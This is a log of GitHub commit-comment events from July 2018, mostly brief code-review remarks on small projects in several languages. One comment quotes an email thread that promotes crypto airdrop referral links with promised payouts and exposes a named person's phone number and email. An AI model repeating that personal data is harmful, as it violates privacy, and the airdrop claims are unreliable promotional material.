{"id":"8033830415","type":"CommitCommentEvent","actor":{"login":"Zelofff"},"repo":{"name":"serginij/reactBlog"},"payload":{"comment":{"id":29873866,"position":6,"line":6,"path":"src/components/Input/Input.js","commit_id":"2643dab9e7ddaf05ca01c3ee883b85635b29814e","created_at":"2018-07-29T11:34:20Z","updated_at":"2018-07-29T11:34:20Z","author_association":"NONE","body":"тут тоже самое"}},"created_at":"2018-07-29T11:34:20Z"}
{"id":"8033831253","type":"CommitCommentEvent","actor":{"login":"Zelofff"},"repo":{"name":"serginij/reactBlog"},"payload":{"comment":{"id":29873867,"position":38,"line":38,"path":"src/components/Input/Input.js","commit_id":"2643dab9e7ddaf05ca01c3ee883b85635b29814e","created_at":"2018-07-29T11:35:02Z","updated_at":"2018-07-29T11:35:02Z","author_association":"NONE","body":"Лучше на deafult возрващать обычный input, как в case 'input', а case 'input' вообще убрать"}},"created_at":"2018-07-29T11:35:02Z"}
{"id":"8033831577","type":"CommitCommentEvent","actor":{"login":"xuxinjiang"},"repo":{"name":"Chanven/CommonPullToRefresh"},"payload":{"comment":{"id":29873868,"position":null,"line":null,"path":null,"commit_id":"237ad1aae2bb61c9370a0dcaa00f1666430ea595","created_at":"2018-07-29T11:35:18Z","updated_at":"2018-07-29T11:35:18Z","author_association":"NONE","body":"我为什么用你这个下拉刷新 直接崩掉了 可以看下错误吗？ 478104175"}},"created_at":"2018-07-29T11:35:18Z"}
{"id":"8033832111","type":"CommitCommentEvent","actor":{"login":"Zelofff"},"repo":{"name":"serginij/reactBlog"},"payload":{"comment":{"id":29873869,"position":5,"line":13,"path":"src/containers/Blog/Blog.js","commit_id":"2643dab9e7ddaf05ca01c3ee883b85635b29814e","created_at":"2018-07-29T11:35:44Z","updated_at":"2018-07-29T11:35:44Z","author_association":"NONE","body":"Такое лучше выносить в утилитные функции, например назвать её formatDate"}},"created_at":"2018-07-29T11:35:44Z"}
{"id":"8033834085","type":"CommitCommentEvent","actor":{"login":"TTtie"},"repo":{"name":"TheBobPony/bobpony.org"},"payload":{"comment":{"id":29873871,"position":null,"line":null,"path":null,"commit_id":"23bb4f9a622a081e1a017b467a7fff91df7632b9","created_at":"2018-07-29T11:37:27Z","updated_at":"2018-07-29T11:37:27Z","author_association":"COLLABORATOR","body":"Yuo forgot [CONTRIBUTING.md](https://github.com/TheBobPony/bobpony.org/blob/master/.github/CONTRIBUTING.md)"}},"created_at":"2018-07-29T11:37:27Z"}
{"id":"8033834361","type":"CommitCommentEvent","actor":{"login":"Zelofff"},"repo":{"name":"serginij/reactBlog"},"payload":{"comment":{"id":29873872,"position":13,"line":46,"path":"src/containers/NewPost/NewPost.js","commit_id":"2643dab9e7ddaf05ca01c3ee883b85635b29814e","created_at":"2018-07-29T11:37:40Z","updated_at":"2018-07-29T11:37:40Z","author_association":"NONE","body":"Тут лучше деструктурировать чисто state, потому что, если у тебя появится еще что-то в state, тебе придется переписывать или делать новую деструктизацию\r\nВ данном случае стоит сделать так:\r\n`const { data: { title, text, tag, name } } = this.state;`"}},"created_at":"2018-07-29T11:37:40Z"}
{"id":"8033834625","type":"CommitCommentEvent","actor":{"login":"xuxinjiang"},"repo":{"name":"Chanven/CommonPullToRefresh"},"payload":{"comment":{"id":29873873,"position":null,"line":null,"path":null,"commit_id":"237ad1aae2bb61c9370a0dcaa00f1666430ea595","created_at":"2018-07-29T11:37:55Z","updated_at":"2018-07-29T11:37:55Z","author_association":"NONE","body":"[\r\n\r\n](url)"}},"created_at":"2018-07-29T11:37:55Z"}
{"id":"8033835243","type":"CommitCommentEvent","actor":{"login":"xuxinjiang"},"repo":{"name":"Chanven/CommonPullToRefresh"},"payload":{"comment":{"id":29873880,"position":null,"line":null,"path":null,"commit_id":"237ad1aae2bb61c9370a0dcaa00f1666430ea595","created_at":"2018-07-29T11:38:25Z","updated_at":"2018-07-29T11:38:25Z","author_association":"NONE","body":"麻烦你加下QQ帮忙看下 谢谢 478104175"}},"created_at":"2018-07-29T11:38:25Z"}
{"id":"8033836742","type":"CommitCommentEvent","actor":{"login":"sirathashimi"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29873882,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-29T11:39:40Z","updated_at":"2018-07-29T11:39:40Z","author_association":"NONE","body":"Log in with your google and click airdrop\n\nOn Sunday, July 29, 2018, Vito Donzelli <notifications@github.com> wrote:\n\n> Hello,\n> Meanwhile, thanks for the list you send me and for advice on airdrops.\n> If I can on these days I'll send you some links too.\n> I wanted to ask you something about Avinoc, the first on the list you\n> sent me. Yesterday I did all the pasaggi and I arrived at 308 dollars.\n> But today on the page of Avinoc I can not find anything and had not\n> made me open an account. Where do I find all my dashboard?\n> Thank you\n> VD\n>\n>\n> Il giorno dom 29 lug 2018 alle ore 06:22 sirathashimi <\n> notifications@github.com> ha scritto:\n>\n> > List of Airdrops\n> >\n> > Avinoc - Aviation Network Operation Chain ($300+)\n> > https://www.avinoc.com/r/Xa4hvUactw9o\n> >\n> > CoTrader - Trading Platform ($20)\n> > https://t.me/CoTraderReferralBot?start=568459030\n> >\n> > ETHX - Global Crypto to Fiat Exchange ($2.5)\n> > https://ethx.co/u/?ref=SIRAT353093\n> >\n> > Gapro - $500\n> > https://www.gapro.io/u/ref/sirathashimi\n> >\n> > Gift.ONE - Biggest Airdrop Organization, win free Gift, Btc, and Eth\n> > everyday. ($20)\n> > https://gift.one/i/t8I9th\n> >\n> > KnowChain - ($25)\n> > http://telegram.me/knowchain_airdrop_bot?start=568459030\n> >\n> > Oodlebit - Crypto Exchange ($50+)\n> > https://oodltrack.com/tracker.php?affid=77&l=0\n> >\n> > OpuLabs - Skincare ($60)\n> > https://opu.ai/signup/uLIyZ34P119330\n> >\n> > The Marine Project - ($180)\n> > t.me/marine_bounty_bot?start=5b5a8c582a601e0054aac318\n> >\n> > Unboxed - ($570+)\n> > https://unboxed.network/c/b45087\n> >\n> > —\n> > You are receiving this because you are subscribed to this thread.\n> > Reply to this email directly, view it on GitHub\n> > <https://github.com/iride2020/iRide-Token/commit/\n> 8f810b3700a24de0ee4f945ef84be7b2f1605610#commitcomment-29872280>,\n> > or mute the thread\n> > <https://github.com/notifications/unsubscribe-auth/An0eU0ItpzkPuWyipA_\n> QR0lIdncXzpjnks5uLTiIgaJpZM4VaEAl>\n> > .\n> >\n>\n>\n> --\n> Vito Donzelli\n> Consigliere Nazionale FICEC - Federazione Italiana Cheerleading E\n> Cheerdance\n> http://www.ficec.it - vito.donzelli@ficec.it\n> Consigliere Provinciale CSI Palermo - Centro Sportivo Italiano\n> http://www.csipalermo.it -\n> Consigliere Asd Subbuteo Club Palermo\n> https://www.facebook.com/subbuteopalermo2016/\n>\n> Tel. 3200449759\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/iride2020/iRide-Token/commit/8f810b3700a24de0ee4f945ef84be7b2f1605610#commitcomment-29873633>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/Am4jXQjAU-Uw5vpGtPwni7uaznrUDyqlks5uLYh0gaJpZM4VaEAl>\n> .\n>\n"}},"created_at":"2018-07-29T11:39:40Z"}
{"id":"8033838786","type":"CommitCommentEvent","actor":{"login":"Shirooooo"},"repo":{"name":"Shirooooo/ss-panel-v3-mod_UIChanges"},"payload":{"comment":{"id":29873883,"position":null,"line":null,"path":null,"commit_id":"873c8c4d6ec8795338913e368ab1bee8b2bea2d0","created_at":"2018-07-29T11:41:25Z","updated_at":"2018-07-29T11:41:25Z","author_association":"OWNER","body":"1"}},"created_at":"2018-07-29T11:41:25Z"}
{"id":"8033842242","type":"CommitCommentEvent","actor":{"login":"Martin-Furter"},"repo":{"name":"OldTinfoil/raspicomm-module"},"payload":{"comment":{"id":29873890,"position":null,"line":null,"path":null,"commit_id":"238cf33723f326c420aa2a43553ebed6ac3230e3","created_at":"2018-07-29T11:44:14Z","updated_at":"2018-07-29T11:44:14Z","author_association":"NONE","body":"Yes, this is exactly the bug I described.\r\nThe read error means that reading the receive FIFO failed after an SPI transfer finished. The value 11 means that both bytes could not be read.\r\nIt happens sometimes when \"WrCfg\" is sent, I never saw it happen with a different SPI command. In that case it just retries that SPI transfer."}},"created_at":"2018-07-29T11:44:14Z"}
{"id":"8033842794","type":"CommitCommentEvent","actor":{"login":"glcanvas"},"repo":{"name":"glcanvas/logic2018"},"payload":{"comment":{"id":29873894,"position":2,"line":2,"path":"README.md","commit_id":"90e5176ee27f32984549665d8a66c00d533cce42","created_at":"2018-07-29T11:44:41Z","updated_at":"2018-07-29T11:44:41Z","author_association":"OWNER","body":"ничего"}},"created_at":"2018-07-29T11:44:41Z"}
{"id":"8033843505","type":"CommitCommentEvent","actor":{"login":"grandinj"},"repo":{"name":"h2database/h2database"},"payload":{"comment":{"id":29873898,"position":217,"line":322,"path":"h2/src/main/org/h2/expression/Operation.java","commit_id":"974ad323378d01c1025fb97f12e4058d285999e2","created_at":"2018-07-29T11:45:13Z","updated_at":"2018-07-29T11:45:13Z","author_association":"CONTRIBUTOR","body":"Sorry, I miswrote. What I meant was there __here__ we can end up with\r\n\r\n   DATE - TIMESTAMP_TZ\r\n\r\nBut perhaps that is from before your change\r\nand similarly weird constructions."}},"created_at":"2018-07-29T11:45:13Z"}
{"id":"8033843866","type":"CommitCommentEvent","actor":{"login":"evilaliv3"},"repo":{"name":"globaleaks/GlobaLeaks"},"payload":{"comment":{"id":29873904,"position":5,"line":37,"path":"client/app/js/services.js","commit_id":"4f6c81ebc636fac7ebf0ed2322eb146c10d5b94a","created_at":"2018-07-29T11:45:28Z","updated_at":"2018-07-29T11:45:28Z","author_association":"CONTRIBUTOR","body":"@NCommander: lets not write the pgp_* prefix where we can, trying to keep the naming alghorithm independent"}},"created_at":"2018-07-29T11:45:28Z"}
{"id":"8033845597","type":"CommitCommentEvent","actor":{"login":"damalitis"},"repo":{"name":"damalitis/cars"},"payload":{"comment":{"id":29873906,"position":null,"line":null,"path":null,"commit_id":"ea6e3d78894f9b4945048127e3550aad4587bec0","created_at":"2018-07-29T11:46:56Z","updated_at":"2018-07-29T11:46:56Z","author_association":"OWNER","body":"This website is simple, showing the cars and it was compiled in PHP, HTML, CSS code."}},"created_at":"2018-07-29T11:46:56Z"}
{"id":"8033845816","type":"CommitCommentEvent","actor":{"login":"evilaliv3"},"repo":{"name":"globaleaks/GlobaLeaks"},"payload":{"comment":{"id":29873907,"position":5,"line":37,"path":"client/app/js/services.js","commit_id":"4f6c81ebc636fac7ebf0ed2322eb146c10d5b94a","created_at":"2018-07-29T11:47:07Z","updated_at":"2018-07-29T11:47:07Z","author_association":"CONTRIBUTOR","body":"I'm writing this specifically because already also we have a public pgp key that is personal and offline. For this new keys is in our interest to have them more transparent and automagical possible. Eventually in the future a 'algo' key will host which kind of key it is."}},"created_at":"2018-07-29T11:47:07Z"}
{"id":"8033846048","type":"CommitCommentEvent","actor":{"login":"evilaliv3"},"repo":{"name":"globaleaks/GlobaLeaks"},"payload":{"comment":{"id":29873908,"position":5,"line":37,"path":"client/app/js/services.js","commit_id":"4f6c81ebc636fac7ebf0ed2322eb146c10d5b94a","created_at":"2018-07-29T11:47:18Z","updated_at":"2018-07-29T11:47:18Z","author_association":"CONTRIBUTOR","body":"\\cc @fpietrosanti "}},"created_at":"2018-07-29T11:47:18Z"}
{"id":"8033847399","type":"CommitCommentEvent","actor":{"login":"LongCatIsLooong"},"repo":{"name":"LongCatIsLooong/PunOko"},"payload":{"comment":{"id":29873909,"position":null,"line":null,"path":null,"commit_id":"342662ff7225993e253f37b56707aae66b0d51fb","created_at":"2018-07-29T11:48:28Z","updated_at":"2018-07-29T11:48:28Z","author_association":"OWNER","body":"Please run [build]"}},"created_at":"2018-07-29T11:48:28Z"}
{"id":"8033849532","type":"CommitCommentEvent","actor":{"login":"stevegomez17"},"repo":{"name":"semver/semver.org"},"payload":{"comment":{"id":29873917,"position":4,"line":27,"path":"lang/zh-CN/index.md","commit_id":"3426b499019e4b7ce5562c0c387c34f9d59e54c9","created_at":"2018-07-29T11:50:21Z","updated_at":"2018-07-29T11:50:21Z","author_association":"NONE","body":"•"}},"created_at":"2018-07-29T11:50:21Z"}
{"id":"8033850569","type":"CommitCommentEvent","actor":{"login":"Shirooooo"},"repo":{"name":"Shirooooo/ss-panel-v3-mod_UIChanges"},"payload":{"comment":{"id":29873920,"position":null,"line":null,"path":null,"commit_id":"ee3177e994f645adca926a67026c65de98341d1b","created_at":"2018-07-29T11:51:08Z","updated_at":"2018-07-29T11:51:08Z","author_association":"OWNER","body":"1"}},"created_at":"2018-07-29T11:51:08Z"}
{"id":"8033851303","type":"CommitCommentEvent","actor":{"login":"stevegomez17"},"repo":{"name":"semver/semver.org"},"payload":{"comment":{"id":29873921,"position":7,"line":29,"path":"lang/zh-CN/index.md","commit_id":"3426b499019e4b7ce5562c0c387c34f9d59e54c9","created_at":"2018-07-29T11:51:44Z","updated_at":"2018-07-29T11:51:44Z","author_association":"NONE","body":"Ω"}},"created_at":"2018-07-29T11:51:44Z"}
{"id":"8033851506","type":"CommitCommentEvent","actor":{"login":"jiajianiu"},"repo":{"name":"jiajianiu/mkdir-hello-world"},"payload":{"comment":{"id":29873922,"position":null,"line":null,"path":null,"commit_id":"8e658fac5a4fbae1257c19a826fc3474c7906106","created_at":"2018-07-29T11:51:57Z","updated_at":"2018-07-29T11:51:57Z","author_association":"OWNER","body":"#git diff"}},"created_at":"2018-07-29T11:51:57Z"}
{"id":"8033852254","type":"CommitCommentEvent","actor":{"login":"TheLastZombie"},"repo":{"name":"TheLastZombie/ich_iel"},"payload":{"comment":{"id":29873925,"position":null,"line":null,"path":null,"commit_id":"25c0cb7483879b88cd7410208a485e9eab981a7a","created_at":"2018-07-29T11:52:31Z","updated_at":"2018-07-29T11:52:31Z","author_association":"OWNER","body":"*$about"}},"created_at":"2018-07-29T11:52:31Z"}
{"id":"8033853107","type":"CommitCommentEvent","actor":{"login":"tgy"},"repo":{"name":"tgy/summer_school_2018"},"payload":{"comment":{"id":29873928,"position":null,"line":null,"path":null,"commit_id":"d1abdc245fa76f6a68c2189b20d10897c8bf689f","created_at":"2018-07-29T11:53:11Z","updated_at":"2018-07-29T11:53:11Z","author_association":"OWNER","body":"On 28.07.2018 11:57, Andreas Mueller wrote:\n> if you @ mention someone in a commit, every time it get's rebased or\n> merged or anything the person will get an email. Just for the future\n> ;)\n\nAh sorry, thanks for letting me know!\n\n-- \nValentin Iovene\n"}},"created_at":"2018-07-29T11:53:11Z"}
{"id":"8033853950","type":"CommitCommentEvent","actor":{"login":"jiajianiu"},"repo":{"name":"jiajianiu/mkdir-hello-world"},"payload":{"comment":{"id":29873929,"position":null,"line":null,"path":null,"commit_id":"8e658fac5a4fbae1257c19a826fc3474c7906106","created_at":"2018-07-29T11:53:52Z","updated_at":"2018-07-29T11:53:52Z","author_association":"OWNER","body":"# git status"}},"created_at":"2018-07-29T11:53:52Z"}
{"id":"8033855495","type":"CommitCommentEvent","actor":{"login":"Simkyu"},"repo":{"name":"Simkyu/algo_baek"},"payload":{"comment":{"id":29873936,"position":null,"line":null,"path":null,"commit_id":"b7487f89d0c0ebdcb7f1c598f6fbf7e0d1ceec30","created_at":"2018-07-29T11:55:07Z","updated_at":"2018-07-29T11:55:07Z","author_association":"OWNER","body":"기존에 위치를 int index를 사용하여 커서의 위치를 지정하였으나, 그럴 경우 처음부터 찾아가야 하므로시간이 오래걸리게 된다고 한다. \r\n\r\n따라서 ListIterator로 대체해서, 커서의 위치를 바로 사용할 수 있도록 한다.\r\n(시간 초과 문제 해결을 위해서 인터넷에서 해결방법을 검색하여 ListIterator로 int 부분을 수정함.)\r\n"}},"created_at":"2018-07-29T11:55:07Z"}
{"id":"8033856687","type":"CommitCommentEvent","actor":{"login":"lionel-"},"repo":{"name":"emacs-ess/ESS"},"payload":{"comment":{"id":29873940,"position":null,"line":null,"path":null,"commit_id":"738c276af7bde4eed1ddae467abe0f28cee067fb","created_at":"2018-07-29T11:56:01Z","updated_at":"2018-07-29T11:56:01Z","author_association":"MEMBER","body":"This is not functionally equivalent. The point was to pick up bare keywords from `ess-R-keywords` so users can remove e.g. `in` from there. Why is it a problem to rely on seq?"}},"created_at":"2018-07-29T11:56:01Z"}
{"id":"8033857589","type":"CommitCommentEvent","actor":{"login":"jiajianiu"},"repo":{"name":"jiajianiu/mkdir-hello-world"},"payload":{"comment":{"id":29873941,"position":null,"line":null,"path":null,"commit_id":"8e658fac5a4fbae1257c19a826fc3474c7906106","created_at":"2018-07-29T11:56:43Z","updated_at":"2018-07-29T11:56:43Z","author_association":"OWNER","body":"#git add read.text"}},"created_at":"2018-07-29T11:56:43Z"}
{"id":"8033858453","type":"CommitCommentEvent","actor":{"login":"Simkyu"},"repo":{"name":"Simkyu/algo_baek"},"payload":{"comment":{"id":29873942,"position":null,"line":null,"path":null,"commit_id":"0cb4ecc0496ddb9870b09f2e6bf80723a0a96b39","created_at":"2018-07-29T11:57:27Z","updated_at":"2018-07-29T11:57:27Z","author_association":"OWNER","body":"1. 문자열에서 \"(\" 일경우 push, \")\" 일 경우 pop 한다.\r\npop 해야하는데 스택이 비어있을 경우 : 임의의 값을 push 하고(여기에선 \"x\"값) break하여 반복문 종료 \r\n2. 최종 스택이 비어있으면 YES, 비어있지 않다면 NO 출력."}},"created_at":"2018-07-29T11:57:27Z"}
{"id":"8033859650","type":"CommitCommentEvent","actor":{"login":"Simkyu"},"repo":{"name":"Simkyu/algo_baek"},"payload":{"comment":{"id":29873946,"position":null,"line":null,"path":null,"commit_id":"0cb4ecc0496ddb9870b09f2e6bf80723a0a96b39","created_at":"2018-07-29T11:58:24Z","updated_at":"2018-07-29T11:58:24Z","author_association":"OWNER","body":"예제 입력을 했을때 모든 결과값이 한번에 나오지 않고, 엔터를 눌러야 하는 경우가 발생한다.\r\n=> BufferedWriter나 StringBuilder를 통해서 한번에 출력하는 것으로 해결한다."}},"created_at":"2018-07-29T11:58:24Z"}
{"id":"8033863778","type":"CommitCommentEvent","actor":{"login":"lionel-"},"repo":{"name":"emacs-ess/ESS"},"payload":{"comment":{"id":29873959,"position":null,"line":null,"path":null,"commit_id":"738c276af7bde4eed1ddae467abe0f28cee067fb","created_at":"2018-07-29T12:01:22Z","updated_at":"2018-07-29T12:01:22Z","author_association":"MEMBER","body":"I'll use this in an upcoming PR:\r\n\r\n```lisp\r\n(let ((bare-keywords (delq nil (mapcar (lambda (keyword)\r\n                                         (car (member keyword ess-r--bare-keywords)))\r\n                                       ess-R-keywords))))\r\n  (cons (regexp-opt bare-keywords 'words) 'ess-keyword-face))\r\n```"}},"created_at":"2018-07-29T12:01:22Z"}
{"id":"8033864433","type":"CommitCommentEvent","actor":{"login":"michael5r"},"repo":{"name":"fiverr/gofor"},"payload":{"comment":{"id":29873963,"position":null,"line":null,"path":null,"commit_id":"2a2031c2b89b70581362d6db77766dd159046028","created_at":"2018-07-29T12:01:48Z","updated_at":"2018-07-29T12:01:48Z","author_association":"NONE","body":"yessss"}},"created_at":"2018-07-29T12:01:48Z"}
{"id":"8033868669","type":"CommitCommentEvent","actor":{"login":"shupra1313"},"repo":{"name":"shupra1313/python-challenge"},"payload":{"comment":{"id":29873976,"position":null,"line":null,"path":null,"commit_id":"2b275390c3091ec4fba02930d5684feb114dea2e","created_at":"2018-07-29T12:04:46Z","updated_at":"2018-07-29T12:04:46Z","author_association":"OWNER","body":"Adding budget_data csv file to the pybank folder"}},"created_at":"2018-07-29T12:04:46Z"}
{"id":"8033868767","type":"CommitCommentEvent","actor":{"login":"Begasus"},"repo":{"name":"haikuports/haikuports"},"payload":{"comment":{"id":29873977,"position":null,"line":null,"path":null,"commit_id":"3f99dfe4166c06db17a4ae59d6a2275857a39f00","created_at":"2018-07-29T12:04:50Z","updated_at":"2018-07-29T12:04:50Z","author_association":"CONTRIBUTOR","body":"shouldn't xproto be declared as \"xproto\" instead of \"xproto$secondaryArchSuffix\"? In this case you grab the 'older' xproto (xproto should call for xorgproto) ..."}},"created_at":"2018-07-29T12:04:50Z"}
{"id":"8033869923","type":"CommitCommentEvent","actor":{"login":"IIvec"},"repo":{"name":"IIvec/Stockfish"},"payload":{"comment":{"id":29873981,"position":null,"line":null,"path":null,"commit_id":"5665010be5a4fdeafbdde539b23b13aef3a087b0","created_at":"2018-07-29T12:05:32Z","updated_at":"2018-07-29T12:05:32Z","author_association":"OWNER","body":"sorry, stopped. Anyway, higher values will be needed here."}},"created_at":"2018-07-29T12:05:32Z"}
{"id":"8033870812","type":"CommitCommentEvent","actor":{"login":"japstoor"},"repo":{"name":"japstoor/Style-in-HTML5"},"payload":{"comment":{"id":29873983,"position":null,"line":null,"path":null,"commit_id":"45dae62ecdcff48e1bc386577b3496d54aba3d5b","created_at":"2018-07-29T12:06:11Z","updated_at":"2018-07-29T12:06:11Z","author_association":"OWNER","body":"Preview of result."}},"created_at":"2018-07-29T12:06:11Z"}
{"id":"8033872831","type":"CommitCommentEvent","actor":{"login":"laurentalacoque"},"repo":{"name":"laurentalacoque/TouchSelfie"},"payload":{"comment":{"id":29873994,"position":null,"line":null,"path":null,"commit_id":"266c50b0c14a66442571a5d80596a602b5b5e896","created_at":"2018-07-29T12:07:35Z","updated_at":"2018-07-29T12:07:35Z","author_association":"OWNER","body":"Hey @steven-a-b,\r\nCould you please fill an issue for this?\r\n\r\nShort answer : try to set your screen width/ height in ’constants.py‘"}},"created_at":"2018-07-29T12:07:35Z"}
{"id":"8033877436","type":"CommitCommentEvent","actor":{"login":"Begasus"},"repo":{"name":"haikuports/haikuports"},"payload":{"comment":{"id":29874002,"position":5,"line":124,"path":"app-office/libreoffice/libreoffice-6.2.0.0~git.recipe","commit_id":"3f99dfe4166c06db17a4ae59d6a2275857a39f00","created_at":"2018-07-29T12:10:45Z","updated_at":"2018-07-29T12:10:45Z","author_association":"CONTRIBUTOR","body":"Maybe xorgproto here?"}},"created_at":"2018-07-29T12:10:45Z"}
{"id":"8033877762","type":"CommitCommentEvent","actor":{"login":"micker"},"repo":{"name":"FLEXIcontent/flexicontent-cck"},"payload":{"comment":{"id":29874004,"position":null,"line":null,"path":null,"commit_id":"8f994f7fc01c999e8232b9520fcee03c2aea895c","created_at":"2018-07-29T12:11:01Z","updated_at":"2018-07-29T12:11:01Z","author_association":"MEMBER","body":"Very cooool"}},"created_at":"2018-07-29T12:11:01Z"}
{"id":"8033879527","type":"CommitCommentEvent","actor":{"login":"nmat"},"repo":{"name":"dbeaver/dbeaver"},"payload":{"comment":{"id":29874011,"position":5,"line":196,"path":"plugins/org.jkiss.dbeaver.ext.postgresql/OSGI-INF/l10n/bundle.properties","commit_id":"d5e1337c74b1360619b781a6429f7b8a278ea970","created_at":"2018-07-29T12:12:20Z","updated_at":"2018-07-29T12:12:20Z","author_association":"NONE","body":"meta.org.jkiss.dbeaver.ext.postgresql.model.PostgreUserMapping.name.name=Nome\r\n\r\nShould it be Nome or Name here? (just curious)"}},"created_at":"2018-07-29T12:12:20Z"}
{"id":"8033880332","type":"CommitCommentEvent","actor":{"login":"heaeat"},"repo":{"name":"heaeat/pcap_test"},"payload":{"comment":{"id":29874013,"position":29,"line":36,"path":"main.cpp","commit_id":"94947272a65e6d65dc624216352851f985f96251","created_at":"2018-07-29T12:12:59Z","updated_at":"2018-07-29T12:12:59Z","author_association":"OWNER","body":"https://github.com/heaeat/pcap_test/blob/0ef17f22c87599a91d3ffc7bd75cde4bf65d8450/main.cpp#L32\r\nswap 함수를 구현하여 수정하였습니다."}},"created_at":"2018-07-29T12:12:59Z"}
{"id":"8033880945","type":"CommitCommentEvent","actor":{"login":"heaeat"},"repo":{"name":"heaeat/pcap_test"},"payload":{"comment":{"id":29874014,"position":57,"line":71,"path":"main.cpp","commit_id":"94947272a65e6d65dc624216352851f985f96251","created_at":"2018-07-29T12:13:28Z","updated_at":"2018-07-29T12:13:28Z","author_association":"OWNER","body":"https://github.com/heaeat/pcap_test/blob/0ef17f22c87599a91d3ffc7bd75cde4bf65d8450/main.cpp#L60\r\n십진수로 출력되도록 수정하였습니다."}},"created_at":"2018-07-29T12:13:28Z"}
{"id":"8033881535","type":"CommitCommentEvent","actor":{"login":"heaeat"},"repo":{"name":"heaeat/pcap_test"},"payload":{"comment":{"id":29874015,"position":72,"line":86,"path":"main.cpp","commit_id":"94947272a65e6d65dc624216352851f985f96251","created_at":"2018-07-29T12:13:59Z","updated_at":"2018-07-29T12:13:59Z","author_association":"OWNER","body":"https://github.com/heaeat/pcap_test/blob/0ef17f22c87599a91d3ffc7bd75cde4bf65d8450/main.cpp#L83\r\n\r\n\"%02x\" 를 통해 두자리로 출력되도록 수정하였습니다."}},"created_at":"2018-07-29T12:13:59Z"}
{"id":"8033881922","type":"CommitCommentEvent","actor":{"login":"alexax66"},"repo":{"name":"danwood76/android_device_samsung_a3xeltexx"},"payload":{"comment":{"id":29874016,"position":621,"line":53,"path":"hardware/power/Power.cpp","commit_id":"aea5b984660ef01c3b7d8bce9580476c511cf6c3","created_at":"2018-07-29T12:14:15Z","updated_at":"2018-07-29T12:14:15Z","author_association":"NONE","body":"Need:   mIsDT2WEnabled = true;\r\nOtherwise not working"}},"created_at":"2018-07-29T12:14:15Z"}
{"id":"8033882020","type":"CommitCommentEvent","actor":{"login":"heaeat"},"repo":{"name":"heaeat/pcap_test"},"payload":{"comment":{"id":29874017,"position":87,"line":128,"path":"main.cpp","commit_id":"94947272a65e6d65dc624216352851f985f96251","created_at":"2018-07-29T12:14:20Z","updated_at":"2018-07-29T12:14:20Z","author_association":"OWNER","body":"https://github.com/heaeat/pcap_test/blob/0ef17f22c87599a91d3ffc7bd75cde4bf65d8450/main.cpp#L104\r\n순서를 바꿔 로직을 수정하였습니다. 감사합니다!"}},"created_at":"2018-07-29T12:14:20Z"}
{"id":"8033882920","type":"CommitCommentEvent","actor":{"login":"Andreaytm"},"repo":{"name":"Andreaytm/Stream2_Project"},"payload":{"comment":{"id":29874021,"position":null,"line":null,"path":null,"commit_id":"4c39db24486fb4fdac349b7a5fdbc9319c964a68","created_at":"2018-07-29T12:15:02Z","updated_at":"2018-07-29T12:15:02Z","author_association":"OWNER","body":"Also updated code from updated database to include more data on resource_type"}},"created_at":"2018-07-29T12:15:02Z"}
{"id":"8033883160","type":"CommitCommentEvent","actor":{"login":"mehdi1400"},"repo":{"name":"mehdi1400/macro"},"payload":{"comment":{"id":29874023,"position":null,"line":null,"path":null,"commit_id":"1e216322fd21dbd798f09f2299d2ba95a765eef0","created_at":"2018-07-29T12:15:11Z","updated_at":"2018-07-29T12:15:11Z","author_association":"OWNER","body":"verified"}},"created_at":"2018-07-29T12:15:11Z"}
{"id":"8033886995","type":"CommitCommentEvent","actor":{"login":"brkydnc"},"repo":{"name":"rust-lang/rust"},"payload":{"comment":{"id":29874030,"position":null,"line":null,"path":null,"commit_id":"c01efc669f09508b55eced32d3c88702578a7c3e","created_at":"2018-07-29T12:18:10Z","updated_at":"2018-07-29T12:18:10Z","author_association":"NONE","body":"henlo"}},"created_at":"2018-07-29T12:18:10Z"}
{"id":"8033887272","type":"CommitCommentEvent","actor":{"login":"xzhangi"},"repo":{"name":"xzhangi/Capstone-P"},"payload":{"comment":{"id":29874031,"position":21,"line":null,"path":"application/models/LockerModel.php","commit_id":"79f228d0acc730fe80acc41e4866445f66ad70d2","created_at":"2018-07-29T12:18:23Z","updated_at":"2018-07-29T12:18:23Z","author_association":"OWNER","body":"Rent date"}},"created_at":"2018-07-29T12:18:23Z"}
{"id":"8033888267","type":"CommitCommentEvent","actor":{"login":"pavanreddy0611"},"repo":{"name":"pavanreddy0611/callforvol"},"payload":{"comment":{"id":29874033,"position":null,"line":null,"path":null,"commit_id":"7a6c056d11be2a5b8db3f440acad7eb67c47a80a","created_at":"2018-07-29T12:19:11Z","updated_at":"2018-07-29T12:19:11Z","author_association":"OWNER","body":"second mistake"}},"created_at":"2018-07-29T12:19:11Z"}
{"id":"8033901915","type":"CommitCommentEvent","actor":{"login":"PascalPrecht"},"repo":{"name":"ipfs/js-ipfs"},"payload":{"comment":{"id":29874073,"position":6,"line":14,"path":"src/core/components/dag.js","commit_id":"d299ed77c288d82ce807af0ec7a5b2605336626f","created_at":"2018-07-29T12:29:33Z","updated_at":"2018-07-29T12:29:33Z","author_association":"CONTRIBUTOR","body":"@negamaxi is that something you ran into? \r\n\r\nThis definitely needs fixing then."}},"created_at":"2018-07-29T12:29:33Z"}
{"id":"8033902816","type":"CommitCommentEvent","actor":{"login":"fichtner"},"repo":{"name":"opnsense/core"},"payload":{"comment":{"id":29874076,"position":null,"line":null,"path":null,"commit_id":"d6d9374b66ccfc861d5ed1bfcd30ac949f2fe4ce","created_at":"2018-07-29T12:30:11Z","updated_at":"2018-07-29T12:30:11Z","author_association":"MEMBER","body":"There will be no next 18.1.x and it's a bit too critical to publish with 18.7 so we will wait for 18.7.1 or 18.7.2 to be sure to test this. I assume it already works on your end?"}},"created_at":"2018-07-29T12:30:11Z"}
{"id":"8033903545","type":"CommitCommentEvent","actor":{"login":"mikhot"},"repo":{"name":"evggorev/bookies_albatros"},"payload":{"comment":{"id":29874081,"position":null,"line":null,"path":null,"commit_id":"418a021fcd2976a756eb6d0097520a0e5742061b","created_at":"2018-07-29T12:30:38Z","updated_at":"2018-07-29T12:30:38Z","author_association":"COLLABORATOR","body":"Added point scores for each set and min/max rating borders for entry in each tournament"}},"created_at":"2018-07-29T12:30:38Z"}
